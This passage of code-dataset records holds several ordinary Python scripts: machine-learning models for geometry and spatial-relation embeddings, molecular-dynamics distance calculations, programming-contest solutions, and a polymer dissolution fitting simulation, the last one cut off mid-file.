+{"seq_id":"429845499","text":"import os\nfrom datetime import datetime\n\nimport numpy as np\nfrom keras import Input\nfrom keras.callbacks import TensorBoard\nfrom keras.engine import Model\nfrom keras.layers import LSTM, Dense, Reshape\nfrom keras.optimizers import Adam\n\nfrom topoml_util.GaussianMixtureLoss import GaussianMixtureLoss\nfrom topoml_util.LoggerCallback import EpochLogger\nfrom topoml_util.geom_scaler import localized_normal, localized_mean\nfrom topoml_util.GeoVectorizer import GeoVectorizer\nfrom topoml_util.wkt2pyplot import wkt2pyplot\nfrom topoml_util.slack_send import notify\n\nSCRIPT_VERSION = \"0.0.1\"\nSCRIPT_NAME = os.path.basename(__file__)\nTIMESTAMP = str(datetime.now()).replace(':', '.') # for Windows compat\nSIGNATURE = SCRIPT_NAME + ' ' + TIMESTAMP\nDATA_FILE = '../files/geodata_vectorized.npz'\nBATCH_SIZE = 5122\nTRAIN_VALIDATE_SPLIT = 0.1\nLATENT_SIZE = 128\nEPOCHS = 50\nOPTIMIZER = Adam(lr=1e-3)\n\nNUM_COMPONENTS = 10\n\nloaded = np.load(DATA_FILE)\nraw_training_vectors = loaded['input_geoms']\nraw_target_vectors = loaded['intersection_surface'][:, 0, :]\n\ntraining_vectors = []\ntarget_vectors = []\n\nfor index, target in enumerate(raw_target_vectors):\n if not target[0] == 0: # a zero coordinate designates an empty geometry\n training_vectors.append(raw_training_vectors[index])\n target_vectors.append(raw_target_vectors[index])\n\n\nmeans = localized_mean(training_vectors)\ntraining_vectors = localized_normal(training_vectors, means, 1e4)\n(data_points, max_points, GEO_VECTOR_LEN) = training_vectors.shape\n\ntarget_vectors = np.reshape(target_vectors, (data_points, 1, 2))\n\ninputs = Input(shape=(max_points, GEO_VECTOR_LEN))\nmodel = Dense(64)(inputs)\nmodel = LSTM(LATENT_SIZE, activation='relu')(model)\nmodel = Dense(NUM_COMPONENTS * 3)(model)\nmodel = Reshape((1, NUM_COMPONENTS * 3))(model)\nmodel = Model(inputs, model)\n\nGMM = GaussianMixtureLoss(NUM_COMPONENTS, max_points)\nmodel.compile(loss=GMM.univariate_gmm_loss, optimizer=OPTIMIZER)\nmodel.summary()\n\ntb_callback = TensorBoard(log_dir='./tensorboard_log/' + TIMESTAMP, write_graph=False)\nepoch_callback = EpochLogger(\n input_func=GeoVectorizer.decypher,\n target_func=lambda x: str(x),\n predict_func=lambda x: str(x),\n aggregate_func=None,\n stdout=True\n)\n\nhistory = model.fit(\n x=training_vectors,\n y=np.array(target_vectors),\n epochs=EPOCHS,\n batch_size=BATCH_SIZE,\n validation_split=TRAIN_VALIDATE_SPLIT,\n callbacks=[epoch_callback, tb_callback]).history\n\nprediction = model.predict(training_vectors[0:1000])\nintersecting_error = np.abs(prediction[:, 0] - target_vectors[0:1000, 0])\n\ndecyphered = [GeoVectorizer.decypher(vector).split('\\n') for vector in training_vectors[0:1000]]\nzipped = zip(decyphered, target_vectors[0:1000, 0], prediction[:, 0])\nsorted_results = sorted(zipped, key=lambda record: abs(record[2] - record[1]))\n\nprint('Intersection surface area mean:', np.mean(target_vectors))\nprint('Intersecting error mean:', np.mean(intersecting_error))\n\nplot_samples = 50\nprint('Saving top and bottom', plot_samples, 'results as plots, this will take a few minutes...')\n# print('Worst', plot_samples, 'results: ', sorted_results[-plot_samples:])\nfor result in sorted_results[-plot_samples:]:\n timestamp = str(datetime.now()).replace(':', '.')\n plot, _, ax = wkt2pyplot(result[0])\n plot.text(0.01, 0.06, 'target: ' + str(result[1]), transform=ax.transAxes)\n plot.text(0.01, 0.01, 'prediction: ' + str(result[2]), transform=ax.transAxes)\n plot.savefig('./plot_images/bad_' + timestamp + '.png')\n plot.close()\n\n# print('Best', plot_samples, 'results:', sorted_results[0:plot_samples])\nfor result in sorted_results[0:plot_samples]:\n timestamp = str(datetime.now()).replace(':', '.')\n plot, _, ax = wkt2pyplot(result[0])\n plot.text(0.01, 0.06, 'target: ' + str(result[1]), transform=ax.transAxes)\n plot.text(0.01, 0.01, 'prediction: ' + str(result[2]), transform=ax.transAxes)\n plot.savefig('./plot_images/good_' + timestamp + '.png')\n plot.close()\n\nnotify(TIMESTAMP, SCRIPT_NAME, 'validation loss of ' + str(history['val_loss'][-1]))\nprint(SCRIPT_NAME, 'finished successfully')\n","sub_path":"model/intersection_surface_gmm.py","file_name":"intersection_surface_gmm.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"177664287","text":"# initialize\nimport glob\nimport numpy as np\nimport mdtraj as md\n\ntopFile = 'csrc_inactive.pdb'\ntop = md.load(topFile).topology\n\n# select the atoms\na1 = top.select('name CD and resid 50 and resname GLU')\nb1 = top.select('name NZ and resid 35 and resname LYS')\n\na2 = a1\nb2 = top.select('name CZ and resid 149 and resname ARG')\npairs = [[a1[0],b1[0]],[a2[0],b2[0]]]\n\n\n# calculate\nfor file in glob.glob('*/*.lh5'):\n\tprint(file)\n\tt = md.load(file)\n\t# distances\n\tdist1 = md.compute_distances(t,pairs)\n\tnp.save(file.replace('.lh5','_KE-RE.npy'), dist1)\n \n \n#### for Gens\nre = [delta[i][1] for i in range(2000)]\nke = [delta[i][0] for i in range(2000)]\nnp.save('Gens_KE.npy', ke)\nnp.save('Gens_RE.npy', re)\n\n#### for Monte Carlo trajectory\nimport glob\nimport numpy as np\nimport mdtraj as md\n\nfile = 'MSM_traj_csrc_100microsecs.pdb'\ntrj = md.load(file)\ntop = trj.topology\n\na1 = top.select('name CD and resid 50 and resname GLU')\nb1 = top.select('name NZ and resid 35 and resname LYS')\n\na2 = a1\nb2 = top.select('name CZ and resid 149 and resname ARG')\n\npairs = [[a1[0],b1[0]],[a2[0],b2[0]]]\ndist2 = md.compute_distances(t,pairs)\nre = [dist2[i][1] for i in range(trj.n_frames)]\nke = [dist2[i][0] for i in range(trj.n_frames)]\n\nnp.save('MSM_traj_csrc_100microsecs_KE.npy', ke)\nnp.save('MSM_traj_csrc_100microsecs_RE.npy', re)\n\n\n\n","sub_path":"MDSimulation/Src/buildMSM/distances.py","file_name":"distances.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"410091665","text":"# https://discuss.leetcode.com/topic/27844/ac-python-dp-solutioin-120ms-based-on-largest-rectangle-in-histogram/2\nclass Solution:\n def maximalRectangle0(self, matrix):\n if not matrix or not matrix[0]:\n return 0\n n = len(matrix[0])\n height = [0] * (n + 1)\n ans = 0\n for row in matrix:\n for i in range(n):\n height[i] = height[i] + 1 if row[i] == '1' else 0\n stack = [-1]\n for i in range(n + 1):\n while height[i] < height[stack[-1]]:\n h = height[stack.pop()]\n w = i - 1 - stack[-1]\n ans = max(ans, h * w)\n stack.append(i)\n return ans\n\n def largestRectangleArea(self, height):\n height.append(0)\n ans = 0\n stack = []\n for i in range(len(height)):\n while len(stack) > 0 and height[i] < height[stack[-1]]:\n h = height[stack.pop()]\n sidx = stack[-1] if len(stack) > 0 else -1\n w = i - sidx - 1\n ans = max(ans, h * w)\n stack.append(i)\n return ans\n\n def maximalRectangle(self, matrix):\n if len(matrix) == 0:\n return 0\n height = [0 for _ in range(len(matrix[0]))]\n maxRect = 0\n for i in range(len(matrix)):\n for j in range(len(height)):\n if matrix[i][j] == '0':\n height[j] = 0\n else:\n height[j] += 1\n maxRect = max(maxRect, self.largestRectangleArea(height))\n height.pop()\n return maxRect\n\n def nextExceed(self, input):\n result = [-1 for _ in range(len(input))]\n monoStack = []\n for i in range(len(input)):\n while len(monoStack) != 0 and input[monoStack[-1]] < input[i]:\n result[monoStack[-1]] = i - monoStack[-1]\n monoStack.pop()\n monoStack.append(i)\n\n return result\n\n\nif __name__ == '__main__':\n sol = Solution()\n\n # print(sol.maximalRectangle([\"10100\", \"10111\", \"11111\", \"10010\"]))\n print(sol.nextExceed([5, 3, 1, 2, 4]))\n","sub_path":"Solutions/085. Maximal Rectangle/085.py","file_name":"085.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"475669740","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: mnist-embeddings.py\n# Author: PatWie \nimport numpy as np\nimport os\n\nfrom tensorpack import *\nimport tensorpack.tfutils.symbolic_functions as symbf\nfrom tensorpack.tfutils.summary import add_moving_summary\nimport argparse\nimport tensorflow as tf\nimport tensorflow.contrib.slim as slim\nimport random\n\nfrom spatial_relations_bb_data import get_test_data, DatasetPairs, DatasetTriplets\n\nembed_dim = 2\noptimizer = \"SGD\"\nlearning_rate = 1e-3\n\nMATPLOTLIB_AVAIBLABLE = False\ntry:\n import matplotlib\n from matplotlib import offsetbox\n import matplotlib.pyplot as plt\n import matplotlib.cm as cm\n import matplotlib.patches as mpatches\n plt.switch_backend('agg')\n MATPLOTLIB_AVAIBLABLE = True\nexcept ImportError:\n MATPLOTLIB_AVAIBLABLE = False \n\nclass EmbeddingModel(ModelDesc):\n global embed_dim\n global optimizer\n def embed(self, x, b, nfeatures=embed_dim):\n\n \"\"\"Embed all given tensors into an nfeatures-dim space. \"\"\"\n list_split = 0\n if isinstance(x, list):\n list_split = len(x)\n x = tf.concat(x, 0)\n\n print('Printing x..')\n print(x.get_shape())\n # pre-process MNIST dataflow data\n #x = tf.expand_dims(x, 3)\n #x = x * 2 - 1\n\n # the embedding network\n #net = slim.layers.conv2d(x, 20, 5, scope='conv1')\n #net = slim.layers.max_pool2d(net, 2, scope='pool1')\n #net = slim.layers.conv2d(net, 50, 5, scope='conv2')\n #net = slim.layers.max_pool2d(net, 2, scope='pool2')\n #net = slim.layers.flatten(net, scope='flatten3')\n #net = slim.layers.fully_connected(net, 500, scope='fully_connected4')\n #embeddings = slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fully_connected5')\n #i = 0\n #for img,bb in zip(x,b):\n with slim.arg_scope([slim.layers.fully_connected], weights_regularizer=slim.l2_regularizer(1e-5)):\n net = slim.layers.conv2d(x, 64, [3, 3], scope='conv1')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool1')\n net = slim.layers.conv2d(net, 128, [3, 3], scope='conv2')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool2')\n net = slim.layers.conv2d(net, 256, [3, 3], scope='conv3')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool3')\n net = slim.layers.conv2d(net, 512, [3, 3], scope='conv4')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool4')\n net = slim.layers.conv2d(net, 512, [3, 3], scope='conv5')\n net = slim.layers.max_pool2d(net, [2, 2], scope='pool5')\n net = slim.layers.flatten(net, scope='flatten5')\n net = slim.layers.fully_connected(net, 4096, scope='fc6')\n print('Printing fc shape...')\n print(net.get_shape())\n if list_split > 0:\n fc6_embed = tf.split(net, list_split, 0)\n bb_float = tf.cast(b, tf.float32)\n net = tf.concat(axis=2, values=[fc6_embed,bb_float])\n print('Printing multi bb shape..')\n print(net.get_shape())\n\n #net = tf.split(net,list_split,axis=0)\n #for j in range(list_split):\n #net = tf.squeeze(net)\n #net = tf.concat([tf.squeeze(net_el) for net_el in net], 0)\n net = tf.reshape(net,[tf.shape(net)[1]*list_split,4104])\n print('Printing reshaped..')\n print(net.get_shape())\n else:\n bb_float = tf.cast(b, tf.float32)\n net = tf.concat(axis=1, values=[net,bb_float])\n print('Printing single bb shape..')\n print(net.get_shape())\n \n net = slim.layers.dropout(net, 0.5, scope='dropout6')\n net = slim.layers.fully_connected(net, 4096, scope='fc7')\n net = slim.layers.dropout(net, 0.5, scope='dropout7')\n #try:\n # _ = embeddings.shape\n # embeddings = np.array(embeddings, slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fc8_'+str(i)))\n #except:\n embeddings = slim.layers.fully_connected(net, nfeatures, activation_fn=None, scope='fc8')\n \n #i = i + 1\n\n # if \"x\" was a list of tensors, then split the embeddings\n if list_split > 0:\n embeddings = tf.split(embeddings, list_split, 0)\n\n return embeddings\n\n def _get_optimizer(self):\n global learning_rate\n lr = symbf.get_scalar_var('learning_rate', learning_rate, summary=True)\n if optimizer=='SGD':\n return tf.train.GradientDescentOptimizer(lr)\n elif optimizer=='Adam':\n return tf.train.AdamOptimizer(lr)\n elif optimizer=='Momentum':\n return tf.train.MomentumOptimizer(lr)\n elif optimizer=='RMSProp':\n return tf.train.RMSPropOptimizer(lr, momentum=0.5)\n\n\nclass SiameseModel(EmbeddingModel):\n @staticmethod\n def get_data():\n ds = DatasetPairs('data/genome_train.json','train')\n ds = AugmentImageComponent(ds, [imgaug.Resize((224, 224))])\n ds = BatchData(ds, 64 // 2)\n return ds\n\n def _get_inputs(self):\n return [InputDesc(tf.float32, (None, 224, 224), 'input'),\n InputDesc(tf.int32, (None, 8), 'bb'),\n InputDesc(tf.float32, (None, 224, 224), 'input_y'),\n InputDesc(tf.int32, (None, 8), 'bb_y'),\n InputDesc(tf.int32, (None,), 'label')]\n\n def _build_graph(self, inputs):\n # get inputs\n img_x, bb_x, img_y, bb_y, label = inputs\n # embed them\n x_embed, y_embed = self.embed([img_x, img_y], [bb_x, bb_y])\n\n # tag the embedding of 'input' with name 'emb', just for inference later on\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0]), name=\"emb\")\n\n # compute the actual loss\n cost, pos_dist, neg_dist = symbf.contrastive_loss(x_embed, y_embed, label, 5., extra=True, scope=\"loss\")\n self.cost = tf.identity(cost, name=\"cost\")\n\n # track these values during training\n add_moving_summary(pos_dist, neg_dist, self.cost)\n\n\nclass CosineModel(SiameseModel):\n def _build_graph(self, inputs):\n x, y, label = inputs\n img_x. bb_x = x\n img_y, bb_y = y\n x_embed, y_embed = self.embed([img_x, img_y], [bb_x, bb_y])\n\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0], inputs[1]), name=\"emb\")\n\n cost = symbf.siamese_cosine_loss(x_embed, y_embed, label, scope=\"loss\")\n self.cost = tf.identity(cost, name=\"cost\")\n add_moving_summary(self.cost)\n\n\nclass TripletModel(EmbeddingModel):\n @staticmethod\n def get_data():\n ds = DatasetTriplets('data/genome_train.json','train')\n ds = AugmentImageComponent(ds, [imgaug.Resize((224, 224))])\n ds = BatchData(ds, 64 // 3)\n return ds\n\n def _get_inputs(self):\n return [InputDesc(tf.float32, (None, 224, 224, 3), 'input'),\n InputDesc(tf.int32, (None, 8), 'bb'),\n InputDesc(tf.float32, (None, 224, 224, 3), 'input_p'),\n InputDesc(tf.int32, (None,8), 'bb_p'),\n InputDesc(tf.float32, (None, 224, 224, 3), 'input_n'),\n InputDesc(tf.int32, (None, 8), 'bb_n')\n ]\n\n def loss(self, a, p, n):\n return symbf.triplet_loss(a, p, n, 5., extra=True, scope=\"loss\")\n\n def _build_graph(self, inputs):\n global embed_dim\n print(len(inputs))\n img_a, bb_a, img_p, bb_p, img_n, bb_n = inputs\n # scaling the bb coordinates wrt image\n bb_a = tf.scalar_mul(224,bb_a)\n bb_p = tf.scalar_mul(224,bb_p)\n bb_n = tf.scalar_mul(224,bb_n)\n a_embed, p_embed, n_embed = self.embed([img_a, img_p, img_n,], [bb_a, bb_p, bb_n], embed_dim)\n\n with tf.variable_scope(tf.get_variable_scope(), reuse=True):\n tf.identity(self.embed(inputs[0], inputs[1], embed_dim), name=\"emb\")\n\n print('Printing shape of embeddings..')\n print(a_embed.get_shape())\n print(p_embed.get_shape())\n cost, pos_dist, neg_dist = self.loss(a_embed, p_embed, n_embed)\n\n self.cost = tf.identity(cost, name=\"cost\")\n add_moving_summary(pos_dist, neg_dist, self.cost)\n\n\nclass SoftTripletModel(TripletModel):\n def loss(self, a, p, n):\n return symbf.soft_triplet_loss(a, p, n, scope=\"loss\")\n\n\ndef get_config(model, algorithm_name):\n\n extra_display = [\"cost\"]\n if not algorithm_name == \"cosine\":\n extra_display = extra_display + [\"loss/pos-dist\", \"loss/neg-dist\"]\n\n return TrainConfig(\n dataflow=model.get_data(),\n model=model(),\n callbacks=[\n ModelSaver(max_to_keep=20, keep_checkpoint_every_n_hours=2)#,\n #ScheduledHyperParamSetter('learning_rate', [(75, 1e-4), (150, 1e-5), (300,1e-6)])\n ],\n extra_callbacks=[\n MovingAverageSummary(),\n ProgressBar(extra_display),\n MergeAllSummaries(),\n RunUpdateOps()\n ],\n max_epoch=400,\n )\n\n\ndef visualize(model_path, model, algo_name):\n if not MATPLOTLIB_AVAIBLABLE:\n logger.error(\"visualize requires matplotlib package ...\")\n return\n pred = OfflinePredictor(PredictConfig(\n session_init=get_model_loader(model_path),\n model=model(),\n input_names=['input','bb'],\n output_names=['emb']))\n\n NUM_BATCHES = 6\n BATCH_SIZE = 64\n #images = np.zeros((BATCH_SIZE * NUM_BATCHES, 224, 224)) # the used digits\n embed = np.zeros((BATCH_SIZE * NUM_BATCHES, 2)) # the actual embeddings in 2-d\n labels = np.zeros((BATCH_SIZE * NUM_BATCHES)) # true labels\n\n # get only the embedding model data (genome test)\n ds = get_test_data('data/genome_test.json')\n ds.reset_state()\n\n for offset, dp in enumerate(ds.get_data()):\n img, bb, label = dp\n \n #TODO: verify input format\n prediction = pred([img, bb])[0]\n embed[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] = prediction\n # TODO: enumerate label and color it accordingly\n #images[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] = img\n labels[offset * BATCH_SIZE:offset * BATCH_SIZE + BATCH_SIZE, ...] = label\n offset += 1\n if offset == NUM_BATCHES: \n break\n\n print('MATPLOTLIB_AVAILABLE: '+str(MATPLOTLIB_AVAIBLABLE))\n plt.ioff()\n fig = plt.figure()\n ax = plt.subplot(111)\n ax_min = np.min(embed, 0)\n ax_max = np.max(embed, 0)\n\n ax_dist_sq = np.sum((ax_max - ax_min)**2)\n ax.axis('off')\n\n # dictionary of labels\n relation_labels = {0:'at', 1:'along', 2:'across', 3:'near/beside', 4:'around', 5:'on top of', 6:'side of', 7:'in/inside', \n 8:'over', 9:'left of', 10:'under/below', 11:'by', 12:'bottom', 13:'outside', 14:'on', 15:'right of'}\n circles = []\n classes = []\n\n # total number of labels\n N = 16\n # define the colormap\n cmap = plt.cm.jet\n # extract all colors from the .jet map\n cmaplist = [cmap(i) for i in range(cmap.N)]\n # create the new map\n cmap = cmap.from_list('Custom cmap', cmaplist, cmap.N)\n\n x = np.arange(N)\n ys = [i+x+(i*x)**2 for i in range(N)]\n #c = cm.rainbow(np.linspace(0, 1, len(ys)))\n c = ['r','b', 'c', 'g','yellow','blueviolet','lightblue','darkgreen','orange','mediumvioletred','lightcoral',\n 'olive','brown','dimgray','steelblue','k']\n\n for i in relation_labels:\n circles.append(mpatches.Circle((0,0),1,color=c[i]))\n classes.append(relation_labels[i])\n\n shown_images = np.array([[1., 1.]])\n for i in range(embed.shape[0]):\n dist = np.sum((embed[i] - shown_images)**2, 1)\n if np.min(dist) < 3e-4 * ax_dist_sq: # don't show points that are too close\n continue\n \n shown_images = np.r_[shown_images, [embed[i]]]\n # TODO: colored circle according to label\n plt.scatter(embed[i][0], embed[i][1], color=c[int(labels[i])])\n #imagebox = offsetbox.AnnotationBbox(offsetbox.OffsetImage(np.reshape(images[i, ...], [224, 224]),zoom=0.6, cmap=plt.cm.gray_r), xy=embed[i], frameon=False)\n #ax.add_artist(imagebox)\n\n plt.axis([ax_min[0]*2, ax_max[0]*2, ax_min[1]*2, ax_max[1]*2])\n plt.xticks([]), plt.yticks([])\n plt.legend(circles, classes, loc='lower left')\n plt.title('Embedding using %s-loss' % algo_name)\n plt.savefig('%s.jpg' % algo_name)\n plt.close(fig)\n\ndef evaluate_random(model_path, model, algo_name):\n global embed_dim\n ensemble_size = 15\n correct = 0\n total = 0\n BATCH_SIZE = 64\n #NUM_BATCHES = 50000\n\n pred = OfflinePredictor(PredictConfig(\n session_init=get_model_loader(model_path),\n model=model(),\n input_names=['input','bb'],\n output_names=['emb']))\n\n # get train data\n dt = get_test_data('data/genome_train.json')\n dt.reset_state()\n print('loaded training data')\n\n train_data = {}\n for offset,dp in enumerate(dt.get_data()):\n #print(offset)\n img, bb, label = dp\n prediction = pred([img, bb])\n embedding = prediction[0]\n for i in range(BATCH_SIZE):\n gt = label[i]\n if gt not in train_data:\n train_data[gt] = [embedding[i]]\n else:\n train_data[gt].append(embedding[i])\n offset += 1\n #if offset == NUM_BATCHES:\n # break\n\n total_tr_data = 0 \n for label in train_data:\n print(str(label) + ': '+ str(len(train_data[label])))\n total_tr_data += len(train_data[label])\n print('total training data: ' + str(total_tr_data))\n\n ds = get_test_data('data/genome_test.json')\n ds.reset_state()\n print('loaded test data')\n\n for dp in ds.get_data():\n img, bb, label = dp\n embed_test_batch = pred([img, bb])[0]\n dist = {}\n for i in range(BATCH_SIZE):\n embed_test = embed_test_batch[i]\n # choose an image randomly from every class\n for l in train_data:\n dist[l] = 0\n r = random.sample(range(0,len(train_data[l])), ensemble_size)\n for sample in r:\n dist[l] += np.linalg.norm(embed_test-train_data[l][sample])\n dist[l] = dist[l]/ensemble_size\n\n min_value = min(dist.itervalues())\n min_keys = [k for k in dist if dist[k] == min_value]\n\n if len(min_keys)==1:\n pred_class = min_keys[0]\n else:\n pred_class = min_keys[random.randint(0,len(min_keys)-1)]\n\n if pred_class == label[i]:\n correct += 1\n total += 1\n\n return correct, total\n\n \n\nif __name__ == '__main__':\n global embed_dim\n global optimizer\n global learning_rate\n parser = argparse.ArgumentParser()\n parser.add_argument('--gpu', help='comma separated list of GPU(s) to use.')\n parser.add_argument('--load', help='load model')\n parser.add_argument('-a', '--algorithm', help='used algorithm', type=str,\n choices=[\"siamese\", \"cosine\", \"triplet\", \"softtriplet\"])\n parser.add_argument('--visualize', help='export embeddings into an image', action='store_true')\n parser.add_argument('--dim', help='dimensionality of the embedding space', type=int)\n parser.add_argument('--evaluate', help = 'compute accuracy', action='store_true')\n parser.add_argument('--modelname', help = 'model directory name', type=str)\n parser.add_argument('--optimizer', help = 'Optimizer', type=str)\n parser.add_argument('--lr', help='learning rate', type=float)\n args = parser.parse_args()\n\n ALGO_CONFIGS = {\"siamese\": SiameseModel,\n \"cosine\": CosineModel,\n \"triplet\": TripletModel,\n \"softtriplet\": SoftTripletModel}\n\n if args.modelname:\n logger.auto_set_dir(name=args.modelname)\n else:\n logger.auto_set_dir(name=args.algorithm)\n #logger.auto_set_dir(name='softtriplet0830-145950')\n\n if args.dim:\n embed_dim = args.dim\n\n if args.optimizer:\n optimizer = args.optimizer\n\n if args.lr:\n learning_rate = args.lr\n\n with change_gpu(args.gpu):\n if args.visualize:\n visualize(args.load, ALGO_CONFIGS[args.algorithm], args.algorithm)\n elif args.evaluate:\n correct, total = evaluate_random(args.load, ALGO_CONFIGS[args.algorithm], args.algorithm)\n print('accuracy: '+str(float(correct)*100/total) + '% = ' + str(correct) + '/' +str(total))\n else:\n config = get_config(ALGO_CONFIGS[args.algorithm], args.algorithm)\n if args.load:\n config.session_init = SaverRestore(args.load)\n SimpleTrainer(config).train()\n else:\n SimpleTrainer(config).train()\n","sub_path":"examples/SimilarityLearning/spatial-relation-bb-embeddings.py","file_name":"spatial-relation-bb-embeddings.py","file_ext":"py","file_size_in_byte":17210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"403575491","text":"import sys\r\ni = open(\"input.txt\",\"r\")\r\no = open(\"output.txt\",\"w\")\r\n\r\ndef main():\r\n \r\n nCases = int(i.readline())\r\n output = []\r\n for case in range(nCases):\r\n nrow = int(i.readline())\r\n row = []\r\n for no in range(4):\r\n row.append(map(int,i.readline().split()))\r\n \r\n\r\n prow = int(i.readline())\r\n pnrow = []\r\n for no in range(4):\r\n pnrow.append(map(int,i.readline().split()))\r\n count = 0\r\n list = []\r\n for numbers in row[nrow - 1]:\r\n for nextnumbers in pnrow[prow - 1]:\r\n if numbers == nextnumbers:\r\n count+=1\r\n list.append(numbers)\r\n if count == 0:\r\n output.append(\"Case #\"+str(case+1)+\": Volunteer cheated!\")\r\n \r\n elif count == 1:\r\n output.append(\"Case #\"+str(case+1)+\": \"+str(list[0]))\r\n else:\r\n output.append(\"Case #\"+str(case+1)+\": Bad magician!\")\r\n\r\n for case in range(nCases):\r\n #print output[case]\r\n o.write(\"{0}\\n\".format(output[case]))\r\n\r\n \r\n\r\nif __name__ == '__main__':\r\n try:\r\n import psyco\r\n psyco.full()\r\n except ImportError:\r\n pass \r\n main()\r\n i.close()\r\n o.close()\r\n\r\n","sub_path":"solutions_python/Problem_135/1989.py","file_name":"1989.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"37914487","text":"import sys\nimport numpy as np\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nfrom scipy.signal import savgol_filter\n\n\nclass DissolutionFitting(object):\n \"\"\"\n Dissolution fitting class\n \"\"\"\n def __init__(self,\n length, nx,\n nt,\n c_a0, c_ea0, c_t0, c_eae0, c_et0,\n c_a_boundary,\n rho, p_gel, nu, d_a,\n exp_times, exp_mass):\n \"\"\"\n constructor for dissolution simulation\n :param length: side length of cubic specimen\n :param nx: number of grid points\n :param nt: number of time steps\n :param c_a0: initial condition\n :param c_ea0: initial condition\n :param c_t0: initial condition\n :param c_eae0: initial condition\n :param c_et0: initial condition\n :param c_a_boundary: boundary condition\n :param rho: polymer density\n :param p_gel: polymer gel point\n :param nu: free volume\n :param d_a: diffusion coefficient\n :param exp_times: experimental times\n :param exp_mass: experimental mass\n \"\"\"\n self.length = length\n self.nx = nx\n self.nt = nt\n\n self.c_a0 = c_a0\n self.c_ea0 = c_ea0\n self.c_t0 = c_t0\n self.c_eae0 = c_eae0\n self.c_et0 = c_et0\n\n self.c_a_boundary = c_a_boundary\n\n self.rho = rho\n self.p_gel = p_gel\n self.nu = nu\n self.d_a = d_a\n\n self.exp_times = exp_times[~np.isnan(exp_times)]\n self.exp_mass = exp_mass[~np.isnan(exp_mass)]\n\n self.smooth_exp_times, self.smooth_exp_mass = self.smooth_experimental_data()\n\n # code for curve fitting goes here\n #\n bounds = (0.0, 1e-11)\n popt, pcov = curve_fit(self.func,\n self.smooth_exp_times, self.smooth_exp_mass,\n bounds=bounds, verbose=2)\n\n self.popt = popt\n self.pcov = pcov\n\n self.fitted_mass = self.func(self.smooth_exp_times, *popt)\n self.times_plot, self.masses_plot = self.results_for_plots()\n\n def results_for_plots(self):\n \"\"\"\n\n :return:\n \"\"\"\n s = interp1d(self.smooth_exp_times, self.fitted_mass,\n kind='cubic')\n times = self.exp_times\n masses = s(times)\n return times, masses\n\n def smooth_experimental_data(self):\n \"\"\"\n smooth experimental data\n :return: smoothed experimental time and mass arrays\n \"\"\"\n s = interp1d(self.exp_times, self.exp_mass,\n kind='cubic')\n times = np.linspace(0.0, np.max(self.exp_times),\n num=self.nt)\n masses = s(times)\n return times, masses\n\n def func(self, times, k0):\n \"\"\"\n function for curve fitting\n :param times: smoothed experimental times\n :param k0: reaction rate constant\n :return: the results of func_inner\n \"\"\"\n return self.func_inner(times, k0)\n\n def func_inner(self, times, k0):\n \"\"\"\n inner function\n :param times: smoothed experimental times\n :param k0: reaction rate constant\n :return: the results of the mass array from a dissolution simulation\n \"\"\"\n time_last = np.max(times)\n\n # call dissolution object here\n #\n d = Dissolution(self.length, self.nx,\n time_last, self.nt,\n self.c_a0, self.c_ea0, self.c_t0, self.c_eae0, self.c_et0,\n self.c_a_boundary,\n self.rho, self.p_gel, self.nu, self.d_a, k0)\n\n return d.mass\n\n\nclass Dissolution(object):\n \"\"\"\n Dissolution base class\n \"\"\"\n def __init__(self,\n length, nx,\n time_end, nt,\n c_a0, c_ea0, c_t0, c_eae0, c_et0,\n c_a_boundary,\n rho, p_gel, nu, d_a, k0):\n \"\"\"\n class constructor for dissolution simulation\n :param length: length of cube side in meters\n :param nx: number of grid points\n :param time_end: simulation time in minutes\n :param nt: number of time steps\n :param c_a0: initial alcohol concentration\n :param c_ea0: initial concentration\n :param c_t0: initial concentration\n :param c_eae0: initial concentration\n :param c_et0: initial concentration\n :param c_a_boundary: alcohol boundary condition\n :param rho: density of polymer\n :param p_gel: gel point of polymer\n :param nu: free molar volume\n :param d_a: diffusion coefficient\n :param k0: reaction rate\n \"\"\"\n self.length = length\n self.nx = nx\n self.time_end = 60.0 * time_end + 60.0 * 60.0\n self.nt = nt\n\n self.c_a0 = c_a0\n self.c_ea0 = c_ea0\n self.c_t0 = c_t0\n self.c_eae0 = c_eae0\n self.c_et0 = c_et0\n self.c_e0 = self.c_et0\n\n self.c_a_boundary = c_a_boundary\n\n self.rho = rho\n self.p_gel = p_gel\n self.nu = nu\n self.d_a = d_a\n self.k0 = k0\n\n self.delta_t = self.time_step()\n self.delta_x = self.space_step()\n\n # self.print_parameters()\n\n if not self.check_stability():\n sys.exit()\n\n self.c_a, self.c_ea, self.c_t, self.c_eae, self.c_et, self.c_e = \\\n self.set_initial_conditions()\n\n self.times, self.space, self.mass = self.run_dissolution()\n self.mass = self.smooth_result()\n\n def smooth_result(self):\n\n mass_smooth = savgol_filter(self.mass, 351, 3)\n\n return mass_smooth\n\n def print_parameters(self):\n print('Cube side length:\\t' +\n str(self.length) + ' meters')\n print('Simulation space step:\\t' +\n str(self.delta_x) + ' meters')\n print('Simulation time:\\t' +\n str(self.time_end) + ' seconds')\n print('Simulation time step:\\t' +\n str(self.delta_t) + ' seconds')\n print('Initial concentration c_a0:\\t' +\n str(self.c_a0) + ' mol/m3')\n print('Initial concentration c_ea0:\\t' +\n 